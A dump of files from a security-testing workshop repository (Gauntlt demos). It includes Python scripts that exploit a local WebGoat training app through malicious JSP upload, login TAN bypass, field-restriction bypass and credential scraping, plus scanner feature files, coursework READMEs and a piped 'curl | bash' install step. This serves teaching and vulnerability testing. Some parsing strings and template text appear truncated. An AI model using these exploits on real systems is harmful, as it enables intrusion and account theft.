20 | url3 = 'http://127.0.0.1:8080/WebGoat/attack?Screen=18&menu=1600'
21 | # our attack file
22 | files = {'file': open('vuln-26,maliciousfileattack.jsp', 'rb')}
23 | # post the attack file
24 | r = session.post(url3, files=files)
25 |
26 | # where the uploaded file should be stored
27 | url4 = 'http://127.0.0.1:8080/WebGoat/uploads/vuln-26,maliciousfileattack.jsp'
28 | # now we need to visit the page in order to fall victim to the attack file
29 | session.get(url4)
30 |
31 | # if the attack worked, a guest.txt file will exist at this location
32 | result = os.path.isfile('/opt/owasp/webgoat/.extract/webapps/WebGoat/mfe_target/guest.txt')
33 |
34 | # have gauntlt check which of these strings appears
35 | if result:
36 | print 'The site is vulnerable.'
37 | else:
38 | print 'The site is secure.'
39 |
40 |
--------------------------------------------------------------------------------
/examples/garmr/README.md:
--------------------------------------------------------------------------------
1 | # Challenge
2 | Garmr is a tool built my Mozilla that checks webpages to meet their security requirements. Some of the things it detects are trivial and some are more important. Since we are using this tool against vulnerable web applications and servers we aren't going to require that it passes all tests. In your environment you can assess what is important for a failure or a pass. This is one of the nice features behind gauntlt--you get to decide what is good or bad on a per application basis.
3 |
4 | The challenge is to run garmr and parse the output.
5 |
6 | # Hints
7 | You need to have Garmr installed on your machine. For your convenience, we have added the Garmr repo in our vendor directory. To install it, run:
8 | ```
9 | # On Ubuntu you might need this package
10 | $ sudo apt-get install python-setuptools
11 | $ cd vendor/Garmr && sudo python setup.py install && cd ../../
12 | ```
13 | Get started with Garmr to get familiar with the output
14 | ```
15 | $ garmr -u http://localhost:8008
16 | $ garmr -u http://localhost:8008 -o garmr-out.xml
17 | ```
18 | Once you feel good with working with the Garmr output, check the `challenge_garmr.attack` to get started. Since the app we are testing is vulnerable it might be a good idea to check for one of the lines that show 'Pass'
19 |
20 | # Solution
21 | Check `final_garmr.attack` for a working solution answer.
22 |
--------------------------------------------------------------------------------
/vendor/gruyere/source/README:
--------------------------------------------------------------------------------
1 | DO NOT COPY THIS CODE OR USE THIS OUTSIDE OF THE GAUNTLT WORKSHOP
2 |
3 | WARNING! For educational and instructional purposes this code is included
4 | with the gauntlt-demo as a target machine for gauntlt testing. Because we
5 | are running Gruyere in a sandboxed environment, a few config settings were
6 | changed to make it function. Please see gruyere.py comments for information.
7 |
8 | Gruyere with original configs can be found at http://google-gruyere.appspot.com/
9 |
10 | DO NOT COPY THIS CODE OR USE THIS OUTSIDE OF THE GAUNTLT WORKSHOP
11 |
12 | -------------------------------
13 |
14 | Gruyere - a web application with holes.
15 |
16 | Copyright 2010 Google Inc. All Rights Reserved.
17 |
18 | This code is licensed under the http://creativecommons.org/licenses/by-nd/3.0/us
19 | Creative Commons Attribution-No Derivative Works 3.0 United States license.
20 |
21 | DO NOT COPY THIS CODE!
22 |
23 | This application is a small self-contained web application with numerous
24 | security holes. It is provided for use with the Web Application Exploits and
25 | Defenses codelab. You may modify the code for your own use while doing the
26 | codelab but you may not distribute the modified code. Brief excerpts of this
27 | code may be used for educational or instructional purposes provided this
28 | notice is kept intact. By using Gruyere you agree to the Terms of Service
29 | http://code.google.com/terms.html
30 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-24/README.md:
--------------------------------------------------------------------------------
1 | TEST vuln-24.attack
2 |
3 | This is a Gauntlt test to check if the vulnerability in WebGoat located at Denial of Service => Denial of Service from Multiple Logins (vuln-24) exists.
4 |
5 | It will print:
6 |
7 | * "Attack Successful. vuln-24 is present" and fail the Gauntlt test if the vulnerability is present
8 | * "Attack Failed. vuln-24 is not present" and pass the Gauntlt test if the vulnerability is fixed (aka not present)
9 |
10 | This test assumes 5 things:
11 |
12 | (1) The Python script is in /home/hacker/gauntlt-demo/examples/webgoat/vuln-24 and that this full path is listed on line 6 in the .attack file
13 |
14 | (2) The Python setuptools package is installed. To install this run the following command on Debian-based systems aka those using .deb packages.
15 | ```
16 | $ sudo apt-get install python-setuptools
17 | ```
18 | (3) The Python pip package is installed. To install this run the following command on Debian-based systems aka those using .deb packages.
19 | ```
20 | $ sudo easy_install pip
21 | ```
22 | (4) The Python requests package is installed. To install this run the following command on Debian-based systems aka those using .deb packages.
23 | ```
24 | $ sudo pip install requests
25 | ```
26 | (5) The Python BeautifulSoup4 package is installed. To install this run the following command on Debian-based systems aka those using .deb packages.
27 | ```
28 | $ sudo pip install beautifulsoup4
29 | ```
--------------------------------------------------------------------------------
/examples/webgoat/vuln-02/vuln-02.py:
--------------------------------------------------------------------------------
1 | # multi_auth1.py
2 | import requests
3 | import json
4 | import pprint
5 | import re
6 | import sys
7 |
8 | DEBUG = False
9 | if len(sys.argv) > 1 and sys.argv[1] == "-d":
10 | DEBUG = True
11 | pp = pprint.PrettyPrinter(indent=4)
12 | http_proxy = "127.0.0.1:8888"
13 | https_proxy = "127.0.0.1:8888"
14 | proxyDict = {"http" : http_proxy, "https" : https_proxy}
15 |
16 | base_url = 'http://localhost:8080/WebGoat/'
17 | s = requests.Session()
18 | if DEBUG:
19 | s.proxies = proxyDict
20 | s.get(base_url + 'login.mvc')
21 | s.post(base_url + 'j_spring_security_check', data = {"username": "guest", "password": "guest"})
22 | list_res = s.get(base_url + 'service/lessonmenu.mvc')
23 | side_list = list_res.json()
24 | auth_items = filter(lambda x: x['name'] == 'Authentication Flaws', side_list)
25 | challenge_obj = filter(lambda y: y['name'] == 'Multi Level Login 1', auth_items[0]['children'])
26 | attack_url = challenge_obj[0]['link']
27 | attack_page_res = s.get(base_url + attack_url)
28 | attack_page = attack_page_res.text
29 | #print attack_page
30 | first_submit = s.post(base_url + attack_url, data = {"user": "Jane", "pass": "tarzan", "Submit": "Submit" })
31 | final = s.post(base_url + attack_url, data = {"hidden_tan": "1", "tan": "15648", "Submit": "Submit" })
32 | success = re.search("Congratulations", final.text)
33 | if success:
34 | print 'vulnerable'
35 | exit(1)
36 | else:
37 | exit(0)
38 |
39 |
--------------------------------------------------------------------------------
/examples/arachni-xss/final_arachni-xss.attack:
--------------------------------------------------------------------------------
1 | @slow @final
2 | Feature: Look for cross site scripting (xss) using arachni against a URL
3 |
4 | Scenario: Using arachni, look for cross site scripting and verify no issues are found
5 | Given "arachni" is installed
6 | And the following profile:
7 | | name | value |
8 | | url | http://localhost:8008 |
9 | When I launch an "arachni" attack with:
10 | """
11 | arachni --modules=xss --depth=1 --link-count=10 --auto-redundant=2
12 | """
13 | Then the output should contain "0 issues were detected."
14 |
15 | Scenario: Using arachni, look for cross site scripting and verify no issues are found
16 | Given "arachni" is installed
17 | And the following profile:
18 | | name | value |
19 | | url | http://localhost:8008 |
20 | When I launch an "arachni-simple_xss" attack
21 | Then the output should contain "0 issues were detected."
22 |
23 | Scenario: On the signup page, use arachni to look for cross site scripting and verify 2 issues are found
24 | Given "arachni" is installed
25 | And the following profile:
26 | | name | value |
27 | | url | http://localhost:8008/signup |
28 | When I launch an "arachni-full_xss" attack
29 | Then the output should contain "2 issues were detected."
30 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-03/attack.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | '''
4 | attack.py
5 |
6 | exploits the Multi Level Login 2 WebGoat vulnerability
7 | '''
8 |
9 | import requests
10 | import re
11 |
12 | # authenticate with webgoat
13 | r = requests.post('http://127.0.0.1:8080/WebGoat/j_spring_security_check', data={'username':'webgoat', 'password':'webgoat'})
14 |
15 | # grab session cookie
16 | cookies = {'JSESSIONID': r.cookies['JSESSIONID']}
17 |
18 | # request the lesson menu
19 | r = requests.get('http://127.0.0.1:8080/WebGoat/service/lessonmenu.mvc', cookies=cookies)
20 |
21 | # find vulnerable url screen id
22 | m = re.search("Multi Level Login 2', u'showHints': True, u'link': u'attack\?Screen=(\d+)", str(r.json))
23 | vuln_id = m.group(1)
24 | vuln_url = 'http://127.0.0.1:8080/WebGoat/attack?Screen={id}&menu=500'.format(id=vuln_id)
25 |
26 | # authenticate at the first level as Joe:banana
27 | v = requests.post(vuln_url,
28 | data={'user2':'Joe', 'pass2':'banana'},
29 | cookies=cookies)
30 |
31 | # try to authenticate at second level as Jane but using Joe's TAN
32 |
33 | x = requests.post(vuln_url,
34 | data={'hidden_user': 'Jane', 'tan2': 15161, 'Submit': 'Submit'},
35 | cookies=cookies)
36 |
37 | # Search for Janes last name and CCN
38 | surname = re.search("Plane", x.text)
39 | ccn = re.search("74589864", x.text)
40 |
41 | if surname and ccn:
42 | print("Attack Successful.")
43 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-20/README.md:
--------------------------------------------------------------------------------
1 | TEST vuln-20.attack
2 |
3 | This is a Gauntlt test to check if the vulnerability in WebGoat located at Injection Flaws => Database Backdoors (vuln-20) exists.
4 |
5 | It will return a
6 |
7 | 1 (error) if the vulnerability is present or attack is unable to execute due to HTTP errors
8 | 0 (success) if the vulnerability is fixed (aka not present)
9 | This test assumes 3 things:
10 |
11 | (1) Requests library for python is installed. The simplest way to do this is to first install pip.
12 |
13 | $ sudo apt-get install python-pip
14 | $ sudo pip install requests
15 |
16 | (2) The script ./webgoat/vuln-20/vuln-20-runner is in the path aka $PATH This can be done & confirmed with:
17 |
18 | $ sudo cp webgoat/vuln-20/vuln-20-runner /usr/bin/
19 | $ sudo chmod 775 /usr/bin/vuln-20-runner
20 | $ which vuln-20-runner
21 | /usr/bin/vuln-20-runner
22 |
23 | (3) There is a local proxy running on 127.0.0.1:8888
24 |
25 | Testing vuln-20 can be done outside of Gauntlt by navigating to the webgoat/vuln-20 directory and running:
26 |
27 | $ python exploit-vuln-20.py
28 |
29 | This Gauntlt test was written by Jeannette Tang (jeannette.tang@utexas.edu) and Kelvin Nguyen (kelvinnguyen@utexas.edu) on Wed, December 9, 2015
30 |
31 | UT CS 361 Fall 2015
32 | Team: ABSA Potatoes
33 | WebGoat Vulnerability: Injection Flaws => Database Backdoor (vuln-20)
34 | Team Members: Jeannette Tang (jeannette.tang@utexas.edu) and Kelvin Nguyen (kelvinnguyen@utexas.edu)
35 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-31/README.md:
--------------------------------------------------------------------------------
1 | **TEST vuln-31.attack**
2 |
3 | This is a Gauntlt test to check if the vulnerability in WebGoat located at General => Http Basics (vuln-31 - Session Management Flaws => Spoof an Authentication Cookie) exists.
4 |
5 | It will print out:
6 |
7 | * __\*\*\*Vulnerability Present\*\*\*__ if the vulnerability is present
8 | * __\*\*\*No Vulnerability\*\*\*__ if the vulnerability is fixed (i.e. not present)
9 |
10 | 1) You have to have requests installed. If you don't have requests installed on your machine, follow these steps to install it:
11 | Clone the public repo:
12 |
13 | $ git clone git://github.com/kennethreitz/requests.git
14 |
15 | Once you have the copy of the source, install it by issuing this command:
16 |
17 | $ python setup.py install
18 |
19 |
20 |
21 | 2) There is a local proxy running on 127.0.0.1:8888 22 | Testing vuln-31 can be done outside of Gauntlt by navigating to the webgoat/vuln-31 directory and running: 23 | 24 | $ python exploit-vuln-31.py 25 | 26 |
27 | 3) Create a new directory called CaseStudyVuln31 and clone the gauntlt repo in that directory. The path to the script is like so. Running Guantlt will be safest if you are cd into this directory. 28 | 29 | /home/hacker/CaseStudyVuln31/gauntlt-demo/examples/webgoat/vuln-31/exploit-vuln-31.py 30 | 31 | 32 |
33 | *This Gauntlt test was written by Tin Vo (tinnvo1101@gmail.com) and Uyviet Nguyen (uyviet.nguyen@utexas.edu) on 10 Dec 2015* 34 | -------------------------------------------------------------------------------- /vendor/gruyere/source/resources/showprofile.gtl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |Gruyere: Profile
6 | [[include:base.css]][[/include:base.css]]
7 |
8 |
9 |
10 | [[include:menubar.gtl]][[/include:menubar.gtl]]
11 | ")
41 | index = 2
42 | # print name + "\n"
43 |
44 | while index < len(spl):
45 | tr = spl[index]
46 | inner_spl = tr.split("")
47 | inner_str = inner_spl[3]
48 | # print str(index) + " " + inner_str
49 | if inner_str[0 : inner_str.find(" ")] != name:
50 | flag = 1
51 | break
52 | index = index + 1
53 |
54 | r5 = s.get(url5, proxies=prox)
55 |
56 | if flag != 0:
57 | print "Attack Successful"
58 | sys.exit(1)
59 | else:
60 | print "Attack Unsuccessful"
61 | sys.exit(0)
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-27/readme.md:
--------------------------------------------------------------------------------
1 | TEST vuln-27.attack
2 |
3 | This is a Gauntlt test to check if the vulnerability in WebGoat located at Parameter Tampering => Bypass HTML Field Restrictions (vuln-27) exists.
4 |
5 | It will return a
6 | - 1 (error) if the vulnerability is present
7 | - 0 (success) if the vulnerability is fixed (aka not present)
8 |
9 | This test assumes 3 things:
10 |
11 | (1) That the python requests, json, and sys modules are all installed. The json and sys modules should both be included with python as of version 2.6 and later.
12 |
13 | ```
14 | $ pip install requests
15 | ```
16 |
17 | (This pip command assumes that the user running it has permissions to write to the directory that pip is using. If there are permission errors, then it *can* be installed as root; however, **the authors do not vouch for anything in the requests library, and extreme caution should be taken when installing foreign libraries as root**.) If pip is not installed, it can be installed with
18 |
19 | ```
20 | $ sudo apt-get install python-pip
21 | ```
22 |
23 | (2) WebGoat is running on http://127.0.0.1:8080/WebGoat/
24 |
25 | (3) The script examples/webgoat/vuln-27/vuln-27.py is in the path ($PATH). One possible way to remidy this problem is to ensure that the python script is executable and then copy it into /usr/bin/.
26 |
27 | ```
28 | $ chmod a+x vuln-27.py
29 | $ sudo cp vuln-27.py /usr/bin/
30 | ```
31 |
32 | Testing vuln-27 can be done outside of Gauntlt by navigating to the examples/webgoat/vuln-27/ directory and running:
33 |
34 | ```
35 | $ python vuln-27.py
36 | ```
37 |
38 | This Gauntlt test was written by Kyle DeHolton and Bryant Peng on Tues, December 8, 2015.
39 |
--------------------------------------------------------------------------------
/labs/sxsw-2014/08_Regex.md:
--------------------------------------------------------------------------------
1 | ## Regex with Gauntlt
2 |
3 | ### Challenge
4 | This is not really a networking problem, but we thought this would be a good place to look at regex and output parsing with gauntlt. One popular network scanning tool, nmap, pads its output with spaces so it can make it difficult to parse the output reliably. Start with `challenge_regex.attack` and customize it so that you parse the output using regex.
5 |
6 | ### Try the challenge
7 | Start with with the `README.md` in `examples/regex` and check the hints section.
8 |
9 | ### Solution
10 | Check `final_regex.attack` for a working solution answer.
11 |
12 | Run `$ bundle exec gauntlt final_regex.attack` and you should get the below output:
13 |
14 | ```
15 | @final @slow
16 | Feature: check to make sure the right ports are open on our server
17 |
18 | Background: # final_regex.attack:4
19 | Given "nmap" is installed # gauntlt-1.0.6/lib/gauntlt/attack_adapters/nmap.rb:4
20 | And the following profile: # gauntlt-1.0.6/lib/gauntlt/attack_adapters/gauntlt.rb:9
21 | | name | value |
22 | | host | localhost |
23 |
24 | Scenario: Verify server is open on expected ports # final_regex.attack:10
25 | When I launch an "nmap" attack with: # gauntlt-1.0.6/lib/gauntlt/attack_adapters/nmap.rb:8
26 | """
27 | nmap -F
28 | """
29 | Then the output should match: # aruba-0.5.3/lib/aruba/cucumber.rb:141
30 | """
31 | 3000\/tcp\s+open
32 | """
33 | Then the output should not match /3001.tcp\s+open/ # aruba-0.5.3/lib/aruba/cucumber.rb:146
34 |
35 | 1 scenario (1 passed)
36 | 5 steps (5 passed)
37 | ```
38 |
--------------------------------------------------------------------------------
/labs/sxsw-2015/08_Regex.md:
--------------------------------------------------------------------------------
1 | ## Regex with Gauntlt
2 |
3 | ### Challenge
4 | This is not really a networking problem, but we thought this would be a good place to look at regex and output parsing with gauntlt. One popular network scanning tool, nmap, pads its output with spaces so it can make it difficult to parse the output reliably. Start with `challenge_regex.attack` and customize it so that you parse the output using regex.
5 |
6 | ### Try the challenge
7 | Start with with the `README.md` in `examples/regex` and check the hints section.
8 |
9 | ### Solution
10 | Check `final_regex.attack` for a working solution answer.
11 |
12 | Run `$ bundle exec gauntlt final_regex.attack` and you should get the below output:
13 |
14 | ```
15 | @final @slow
16 | Feature: check to make sure the right ports are open on our server
17 |
18 | Background: # final_regex.attack:4
19 | Given "nmap" is installed # gauntlt-1.0.6/lib/gauntlt/attack_adapters/nmap.rb:4
20 | And the following profile: # gauntlt-1.0.6/lib/gauntlt/attack_adapters/gauntlt.rb:9
21 | | name | value |
22 | | host | localhost |
23 |
24 | Scenario: Verify server is open on expected ports # final_regex.attack:10
25 | When I launch an "nmap" attack with: # gauntlt-1.0.6/lib/gauntlt/attack_adapters/nmap.rb:8
26 | """
27 | nmap -F
28 | """
29 | Then the output should match: # aruba-0.5.3/lib/aruba/cucumber.rb:141
30 | """
31 | 3000\/tcp\s+open
32 | """
33 | Then the output should not match /3001.tcp\s+open/ # aruba-0.5.3/lib/aruba/cucumber.rb:146
34 |
35 | 1 scenario (1 passed)
36 | 5 steps (5 passed)
37 | ```
38 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-04/http_attack.py:
--------------------------------------------------------------------------------
1 | #Python attack file
2 |
3 | import requests
4 | import json
5 |
6 | url1 = "http://127.0.0.1:8080/WebGoat/login.mvc"
7 | url2 = "http://127.0.0.1:8080/WebGoat/j_spring_security_check"
8 | payload = {'username':'guest','password':'guest'}
9 | session = requests.Session()
10 | first_request = session.get(url1)
11 | login = session.post(url2, data=payload)
12 |
13 | url3 = "http://127.0.0.1:8080/WebGoat/service/lessonmenu.mvc"
14 | second_request = session.get(url3)
15 |
16 | text = second_request.text
17 |
18 | i = text.index("Discover Clues in the HTML")
19 | text = text[i:]
20 | j = text.index('link') + 7
21 |
22 | text = text[j:]
23 | k = text.index('"')
24 | text = text[:k]
25 |
26 | # Send the attack string to WebGoat to get the exercise's response
27 | url4 = "http://127.0.0.1:8080/WebGoat/" + text
28 | third = session.get(url4)
29 | third_response = third.text
30 |
31 | #Parse the response to get the username and password
32 | i = third_response.index('')
41 | password = third_response[:k]
42 |
43 | #log into the exercise using the found username and password
44 | payload2 = {'Username':username,'Password':password}
45 | login2 = session.post(url4, data=payload2)
46 |
47 | #confirm is was successful
48 | fourth = session.get(url3)
49 |
50 | confirm_text = fourth.text
51 |
52 | i = confirm_text.find("true")
53 |
54 | if i is not -1:
55 | print 'Vulnerability Exploited'
56 | else:
57 | print 'Success'
58 |
59 |
60 |
61 |
62 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-45/README.md:
--------------------------------------------------------------------------------
1 | vuln-45 AJAX ==> DOM Injection
2 |
3 | This vulnerability is done under the assumption that WebGoat and Gauntlt have both been successfully installed.
4 |
5 | In order to check this, you can go ahead and run the following commands:
6 |
7 | which gauntlt
8 | source .rvm/scripts/rvm
9 | which gauntlt
10 |
11 | The above commands double check a successful installation of gauntlt.
12 |
13 | Performing the vulnerability assessment requires a few additional packages. Below are the Programs/Packages requred and also the commands to type if using a command line interface. (one caviat is that get-pip.py must be installed from the website first). The last thing required is a request library provided to python which makes the session handling phenomenally easier.
14 |
15 | python:
16 | [hacker@console] [~/]$ sudo apt-get install python (on Debian32 Machine)
17 |
18 | pip:
19 | [hacker@console] [~/]$ python get-pip.py (performed in same working directory as downloaded file
20 |
21 | requests library:
22 | [hacker@console] [~/]$ pip install requests
23 |
24 | With all of the above installed, we assume that the vulnerable application is currently running. In our instance, WebGoat.
25 |
26 | In order to execute the python attack alone, it is done with the following command (must be in current directory of python script) :
27 |
28 | [hacker@console] [~/]$ python vuln-45.py
29 |
30 | Synching the phython script into the gaunlt attack file requires manually pointing to that script within the .attack file.
31 |
32 | Running the phython script within the attack file utilizing gauntlt requires the following command:
33 |
34 | [hacker@console] [~/]$ gauntlt vuln-45.attack
35 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-39/README.md:
--------------------------------------------------------------------------------
1 | #TEST vuln-39.attack
2 |
3 | This is a [Gauntlt](http://gauntlt.org/) test to check if the vulnerability in WebGoat located at AJAX Security => Insecure Client Storage (vuln-39) exists.
4 |
5 | It will return a
6 | - Vulnerable: (error) if the vulnerability is present
7 | - No Vulnerability: (success) if the vulnerability is fixed (aka not present)
8 |
9 | ##This test assumes 3 things:
10 |
11 | ####(1) Environment
12 |
13 | - This test assumes the test is being run in HackingLab with Gauntlt and WebGoat on it. If not installed, via root terminal run:
14 |
15 | ```
16 | $ curl -sSL http://bit.ly/1MJ3qNp | bash
17 | ```
18 |
19 | - Then in a not root terminal run:
20 |
21 | ```
22 | $ source .rvm/scripts/rvm
23 | ```
24 |
25 | - It also assumes that Python (at least v. 2.7.3) is installed. This is included in HackingLab.
26 | - That pip is installed. Pip can be installed via terminal
27 |
28 | ```
29 | $ sudo apt-get install python-pip python-dev build-essential
30 | $ sudo pip install --upgrade pip
31 | $ sudo pip install --upgrade virtualenv
32 | ```
33 |
34 | - That the request and json libraries are installed
35 | ```
36 | $ pip install requests
37 | $ pip install json
38 | ```
39 |
40 | ####(2) That the gauntlt/gauntlt-demo has been cloned
41 |
42 | ```
43 | $ git clone https://github.com/gauntlt/gauntlt-demo.git
44 | ```
45 | ####(3) That WebGoat is running on a local proxy: 127.0.0.1:8888
46 |
47 | ## Running the Test
48 |
49 | Testing vuln-39 can be done by navigating to the gauntlt-demo/examples/webgoat/vuln-39 directory and running:
50 |
51 | ```
52 | $ gauntlt
53 | ```
54 |
55 | This Gauntlt test was written by Cynthia Ibarra and Mauricio Amezcua
56 |
--------------------------------------------------------------------------------
/labs/velocity-eu-2013/08_Regex.md:
--------------------------------------------------------------------------------
1 | ## Regex with Gauntlt
2 |
3 | ### Challenge
4 | This is not really a networking problem, but we thought this would be a good place to look at regex and output parsing with gauntlt. One popular network scanning tool, nmap, pads its output with spaces so it can make it difficult to parse the output reliably. Start with `challenge_regex.attack` and customize it so that you parse the output using regex.
5 |
6 | ### Try the challenge
7 | Start with with the `README.md` in `examples/regex` and check the hints section.
8 |
9 | ### Solution
10 | Check `final_regex.attack` for a working solution answer.
11 |
12 | Run `$ bundle exec gauntlt final_regex.attack` and you should get the below output:
13 |
14 | ```
15 | @final @slow
16 | Feature: check to make sure the right ports are open on our server
17 |
18 | Background: # final_regex.attack:4
19 | Given "nmap" is installed # gauntlt-1.0.6/lib/gauntlt/attack_adapters/nmap.rb:4
20 | And the following profile: # gauntlt-1.0.6/lib/gauntlt/attack_adapters/gauntlt.rb:9
21 | | name | value |
22 | | host | localhost |
23 |
24 | Scenario: Verify server is open on expected ports # final_regex.attack:10
25 | When I launch an "nmap" attack with: # gauntlt-1.0.6/lib/gauntlt/attack_adapters/nmap.rb:8
26 | """
27 | nmap -F
28 | """
29 | Then the output should match: # aruba-0.5.3/lib/aruba/cucumber.rb:141
30 | """
31 | 3000\/tcp\s+open
32 | """
33 | Then the output should not match /3001.tcp\s+open/ # aruba-0.5.3/lib/aruba/cucumber.rb:146
34 |
35 | 1 scenario (1 passed)
36 | 5 steps (5 passed)
37 | ```
38 |
39 |
40 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-40/README.md:
--------------------------------------------------------------------------------
1 | # TEST Vuln-40
2 |
3 | #### What is being tested
4 |
5 | This is a Gauntlt test to check if the vulnerability in WebGoat located at AJAX Security => LAB: DOM-Based cross-site scripting (vuln-40) exists.
6 |
7 | #### What is being returned
8 |
9 | It will return a
10 | - 1 (error) exit code if the vulnerability is present and will print out the phrase "Vulnerable"
11 | - 0 (success) exit code if the vulnerability is fixed (aka not present) and will print out the phrase "Safe"
12 |
13 | ## Test Requirements
14 |
15 | - Ensure ruby, ruby gems, gauntlt, and WebGoat are installed properly and that WebGoad is listening on port 8080
16 | - Ensure that xvfb is installed
17 | ```
18 | sudo apt-get install xvfb
19 | ```
20 | - Ensure that the watir-webdriver and headless gems are installed
21 | ```
22 | gem install watir-webdriver
23 | gem install headless
24 | ```
25 |
26 | ## Test Assumptions
27 |
28 | - This test assumes that the vuln-40.rb file has executable permissions
29 | - This test assumes that the default time limit for the aruba gem is extended. To do this, run the following command (changing the path as necessary to account for your account name):
30 | ```
31 | vim +355 /home/hacker/.rvm/gems/ruby-2.2.1/gems/aruba-0.5.4/lib/aruba/api.rb
32 | ```
33 | and change `DEFAULT_TIMEOUT_SECONDS = 3` to `DEFAULT_TIMEOUT_SECONDS = 30`
34 |
35 | - The path to `vuln-40.rb` is assumed to be `/home/hacker/gauntlt-demo/examples/Vuln-40/vuln-40.rb`. If this path differs, make the appropriate changes to the `vuln-40.attack` file in the `When I launch a "generic" attack with:` section
36 |
37 | ## Running the test
38 |
39 | To run the test, run the following command
40 | ```
41 | gauntlt /path/to/vuln-40.attack
42 | ```
--------------------------------------------------------------------------------
/labs/sxsw-2015/02_Setup using Vagrant.md:
--------------------------------------------------------------------------------
1 | ## Gauntlt
2 | The workshop uses a Vagrant box for the hands-on portion. Vagrant uses VirtualBox to run a fully contained virtual machine that will let you setup a test lab and get you started using gauntlt. These instructions should work with any host, however OS X and Ubuntu are preferred.
3 |
4 | ### Download gauntlt-sxsw-2015.box (~700MB)
5 |
6 | This box was made using the gauntlt starter kit. We just made it as a box to save time building all the dependencies. The gauntlt is available at https://github.com/gauntlt/gauntlt-starter-kit.
7 |
8 | ```
9 | $ mkdir -p ~/sxsw-2015/box
10 | $ cd ~/sxsw-2015/box
11 | $ wget https://s3.amazonaws.com/gauntlt-sxsw/gauntlt-sxsw-2015.box
12 | ```
13 |
14 | ### Install VirtualBox
15 | ```
16 | https://www.virtualbox.org/
17 | ```
18 |
19 | ### Install Vagrant
20 | ```
21 | http://downloads.vagrantup.com/
22 | ```
23 |
24 | ### Set up a working directory
25 | ```
26 | $ cd ~/sxsw-2015
27 | $ vagrant box add sxsw-2015 ~/sxsw-2015/box/gauntlt-sxsw-2015.box
28 | $ vagrant init sxsw-2015
29 | ```
30 |
31 | ### Edit the newly created VagrantFile and add these two lines
32 | ```
33 | config.vm.network :forwarded_port, guest: 3000, host: 3000
34 | config.vm.network :forwarded_port, guest: 8008, host: 8008
35 | ```
36 |
37 | ### Start up the box
38 | ```
39 | $ vagrant up
40 | $ vagrant ssh
41 | ```
42 | You should be greeted with `vagrant@vagrant-ubuntu-trusty-64:~$` if it worked ok.
43 |
44 | ### Initialize
45 | Make sure the repo is up-to-date
46 | ```
47 | vagrant@vagrant-ubuntu-trusty-64:~$ cd ./gauntlt-demo
48 | vagrant@vagrant-ubuntu-trusty-64:~/gauntlt-demo$ git pull origin master
49 | vagrant@vagrant-ubuntu-trusty-64:~/gauntlt-demo$ bundle install
50 | ```
51 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-09/helper.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | import requests
4 | import json
5 |
6 | cookies = None
7 | loginCreds = {"username":"guest", "password":"guest"}
8 | url = "http://127.0.0.1:8080/WebGoat/"
9 | link = ""
10 | success = True
11 |
12 | def printCookies():
13 | for cookie in cookies:
14 | print(cookie.name)
15 | print(cookie.value)
16 | print("HttpOnly" in cookie._rest)
17 | print("=========================")
18 |
19 |
20 | def login():
21 | global link, cookies
22 | r1 = requests.get(url + "login.mvc")
23 | cookies = r1.cookies;
24 | r2 = requests.post(url + "j_spring_security_check", data = loginCreds, cookies = cookies)
25 | cookies.update(r2.history[0].cookies)
26 | r3 = requests.get(url + "service/lessonmenu.mvc", cookies=cookies)
27 | j = json.loads(r3.text)
28 | link = url + j[8]["children"][7]["link"]
29 | r4 = requests.get(link, cookies=cookies)
30 | cookies.update(r4.cookies)
31 |
32 | def pressReadButton():
33 | global success
34 | data = {"httponly":"True", "httponly_value":"True","read_result":"", "action":"Read Cookie"}
35 | r1 = requests.post(link, data=data, cookies=cookies)
36 | r1.history
37 | cookies.update(r1.cookies)
38 | found = False
39 | for cookie in cookies:
40 | if (cookie.name == "unique2u"):
41 | found = True
42 | if ("HttpOnly" not in cookie._rest):
43 | success = False
44 | success = success and found
45 |
46 | def pressWriteButton():
47 | global success
48 | data = {"httponly_value":"True","read_result":"", "action":"Write Cookie"}
49 | r1 = requests.post(link, data=data, cookies = cookies)
50 | success = success and (r1.text.find("* SUCCESS: Your browser enforced") > 0)
51 |
52 | login()
53 | pressReadButton()
54 | pressWriteButton()
55 | print(success)
56 |
57 |
58 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-27/vuln-27.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | import requests
4 | import json
5 | import sys
6 |
7 | s = requests.Session()
8 |
9 | # Request to the login page to get the initial cookie
10 | s.get("http://127.0.0.1:8080/WebGoat/login.mvc")
11 |
12 | # POST to the login page to login and receive the proper auth cookie
13 | loginInfo = {"username":"guest", "password":"guest"}
14 | s.post("http://127.0.0.1:8080/WebGoat/j_spring_security_check", data=loginInfo)
15 |
16 | # Make a request to a random screen and menu
17 | s.get("http://127.0.0.1:8080/WebGoat/attack?Screen=170&menu=100")
18 |
19 | # Get the JSON string with all the menu items
20 | menuJson = s.get("http://127.0.0.1:8080/WebGoat/service/lessonmenu.mvc")
21 |
22 | # Turn string into python dict
23 | d = json.loads(menuJson.text)
24 |
25 | link = None
26 |
27 | # Find the values for screen and manu in the JSON
28 | for i in range(len(d)):
29 | if d[i]['name'] == "Parameter Tampering":
30 | for j in range(len(d[i]['children'])):
31 | if d[i]['children'][j]['name'] == "Bypass HTML Field Restrictions":
32 | link = d[i]['children'][j]['link']
33 |
34 | if link == None:
35 | # No proper menu item found - in theory should never hit this.
36 | sys.exit()
37 |
38 | submitURL = "http://127.0.0.1:8080/WebGoat/" + link
39 | challengeParams = {"select": "baz", "radio": "baz", "checkbox": "whoops", "shortinput": "howd+that+happen", "disabledinput": "uh+oh", "SUBMIT": "Admit"}
40 | finalResult = s.post(submitURL, data=challengeParams)
41 |
42 | # Check to make sure that the challenge passed on the website
43 | if "Congratulations. You have successfully completed this lesson." in finalResult.text:
44 | print "HTML field restrictions were successfully bypassed"
45 | else:
46 | print "The HTML field restrictions could not be bypassed"
